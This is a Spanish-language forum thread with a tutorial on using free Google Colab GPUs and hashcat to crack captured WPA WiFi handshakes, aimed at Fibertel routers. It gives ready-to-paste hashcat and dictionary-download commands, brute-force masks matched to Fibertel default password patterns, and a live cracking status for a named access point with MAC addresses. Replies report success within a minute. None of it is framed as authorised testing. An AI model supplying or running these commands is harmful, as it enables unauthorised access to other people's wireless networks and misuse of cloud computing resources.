Tutorial: Utilizar gratis GPU de Google para crackear redes WiFi

Publicado por Damtiz, 28 de Junio de 2020, 07:45:54 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Damtiz

Buen dia, les traigo esta plataforma que acabo de descubrir. Se llama Google Colab
Colab te permite ejecutar y programar en Python  en el navegador utilizando los recursos que nos ofrece Google.

Podes utilizar cualquier diccionario, aqui te voy a dar un ejemplo utilizando un diccionario para redes Fibertel.

Pasos a seguir:
1. Ir al siguiente enlace y has click en "copiar en drive".
You are not allowed to view links. Register or Login

2. Haz clic en "Entorno de ejecución", "Cambiar tipo de tiempo de ejecución" y establecer el acelerador de hardware en la GPU.

3. Anda a Google Drive y crea una carpeta llamada dothashcat, con un carpeta en su interior llamada hashes. Aqui es donde tienes que poner tus capturas en formato .hccapx
Ademas, dentro de la carpeta dothashcat guardaremos el diccionario fibertel en formato rar, asi que lo bajamos y lo subimos ahi. Lo podes bajar desde You are not allowed to view links. Register or Login

4. En google Colab, ve al fondo del archivo y dale click a "+ Codigo", y pega lo siguiente:

#-----Diccionario Fibertel----------
!unrar x /root/.hashcat/todo_fiber_19__2.5GB.rar
!hashcat -m 2500 /root/.hashcat/hashes/TuCaptura.hccapx todo_fiber_19.txt
#---------------------------------------------------------

5. Ahora haz clic en "Entorno de ejecución"  y luego en "Ejecutar todo"
Cuando te pida un token de Google Drive, ve al enlace que te proporciona y autentifícate con tu cuenta de Google para obtener el token. Ingresa esa clave en Google Colab.

Y listo, eso es todo!! Adjunto una captura de la velocidad con la que trabaja. (con la GPU NVIDIA K80)


Tesla P100-PCIE-16GB (374 mil claves por segundo)



Fuente: You are not allowed to view links. Register or Login

Actualización: Usar otros diccionarios
Para otros diccionarios pesados recomiendo bajarlos desde colab, no es necesario guardarlo en tu google drive.
Podes buscar diccionarios desde la pagina You are not allowed to view links. Register or Login y bajarlos copiando el link del diccionario
Por ejemplo:

#Only_latin (2.16 Gb) - De weakpass
!wget You are not allowed to view links. Register or Login
!hashcat -m 2500 /root/.hashcat/hashes/TuCaptura.hccapx only_latin.Top.gz

(recomiendo usar ese diccionario, me ha dado muy buenos resultados)
Un saludo, comenta si te sirvió!!!


notmebug

¡Muy buen aporte! Esto se ve picante, 71,8 KH/s sin pagar nada suena buenísimo. Esperemos que dure.

Damtiz

@notmebug Y si tenes suerte (como yo en estos momentos), Google te puede dar otra GPU mas potente, dependiendo de la disponibilidad que tenga.

Ahora esta utilizando la Tesla P100-PCIE-16GB
Mira, 374 mil por segundo!!!

ghr71


Huev0


GustavocAr

Increible!

Session..........: hashcat
Status...........: Running
Hash.Name........: WPA-EAPOL-PBKDF2
Hash.Target......: Speedy-BC4AA0 (AP:84:aa:9c:bc:4a:a0 STA:a8:51:5b:9c:ac:97)
Time.Started.....: Tue Jul  7 21:16:51 2020 (5 secs)
Time.Estimated...: Wed Jul  8 03:33:15 2020 (6 hours, 16 mins)
Guess.Mask.......: ?d?d?d?d?d?d?d?d?d?d [10]
Guess.Queue......: 3/3 (100.00%)
Speed.#1.........:   442.8 kH/s (7.85ms) @ Accel:8 Loops:32 Thr:1024 Vec:1
Recovered........: 0/1 (0.00%) Digests
Progress.........: 1835008/10000000000 (0.02%)
Rejected.........: 0/1835008 (0.00%)
Restore.Point....: 0/1000000000 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:4-5 Iteration:96-128
Candidates.#1....: 9234567899 -> 9160624569
Hardware.Mon.#1..: Temp: 47c Util: 98% Core:1328MHz Mem: 715MHz Bus:16

tatus [p]ause ypass [c]heckpoint [q]uit =>

h4x0r


lucaseo

#7
Segui todos los pasos tal cual y me aparece este error al querer ejecutar hashcat.

You are not allowed to view links. Register or Login

h4x0r


Damtiz

 You are not allowed to view links. Register or Login
No, no esta fallando. A mi me funciona sin inconvenientes. El tutorial tiene un problema que tengo que acomodar.

You are not allowed to view links. Register or Login El link de mediaifire se vence por lo tanto google puede descargar el diccionario. Por eso mismo falla la extracción del archivo. Lo que podes hacer para solucionarlo es bajar le diccionario de fibertel a tu compu desde aca: You are not allowed to view links. Register or Login y subirlo manualmente a la pagina. Tarda segundos.

En la barra lateral izquierda te permite subir los archivos arrastrandolo. Una vez que subas el .rar solo tenes que ejecutar !unrar x todo_fiber_19.rar

h4x0r

You are not allowed to view links. Register or Login
No, no esta fallando. A mi me funciona sin inconvenientes. El tutorial tiene un problema que tengo que acomodar.

No te voy a decir A por B, como yo lo uso con google drive estaba fallando, tuve que hacerlo de un modo como lo haces vos descargando el archivo.

La falla era que no iniciaba el hashcat, se quedaba colgado, ya me paso en otra oportunidad ese drama, se ve que es un drama interno.

notmebug

Los patrones de Fibertel son tan simples que se podría utilizar seq para generar el diccionario in situ, en vez de tener que descargarlo o resubirlo constantemente.

ghost800

puede estar fallando google colab , igualmente para fibertel es mejor subir la mascara en formato .hcmask en la barra lateral , que no pesa nada y ejecutarla directamente desde la ultima barra
!hashcat -m 2500 /root/.hashcat/hashes/TuCaptura.hccapx -a3 -m 2500 fibertel.hcmask --force -D1,2 -w 3 -w 4

la mascara esta subida en un post de hace tiempo de h4xor..
tuve el mismo problema con ese diccionario hace un tiempo cuando intente probarlo..

lucaseo

You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login El link de mediaifire se vence por lo tanto google puede descargar el diccionario. Por eso mismo falla la extracción del archivo. Lo que podes hacer para solucionarlo es bajar le diccionario de fibertel a tu compu desde aca: You are not allowed to view links. Register or Login y subirlo manualmente a la pagina. Tarda segundos.

En la barra lateral izquierda te permite subir los archivos arrastrandolo. Una vez que subas el .rar solo tenes que ejecutar !unrar x todo_fiber_19.rar

Gracias!! ya lo solucioné subiendo la máscara de fibertel, gracias a la ayuda por privado de ghost800 y h4x0r , en 1 minuto ya tenía la clave :)

h4x0r

You are not allowed to view links. Register or Login, yo para fibertel a veces uso un modo mas completo para hacer todos los que xxx + 7 o xxx + 8, te dejo las 2 lineas que uso.

-1 01 0?1?d?d?d?d?d?d?d?d (esta sirve para todos los 0xx + 7)

-1 01 0?1?d?d?d?d?d?d?d?d?d  (esta sirve para todos los 0xx + 8)


You are not allowed to view links. Register or Login, que bueno que pudistes hacerlo!!

fijate las lineas de arriba, tambien podes usarlar para fibertel.

tambien la otra opcion buena es apretar el boton que dice "+Codigo" y ahi agregan mas lineas y quedan encoladas, entonces si ponele que le pasastes 8 digitos y no salio sigue con la siguiente linea y asi.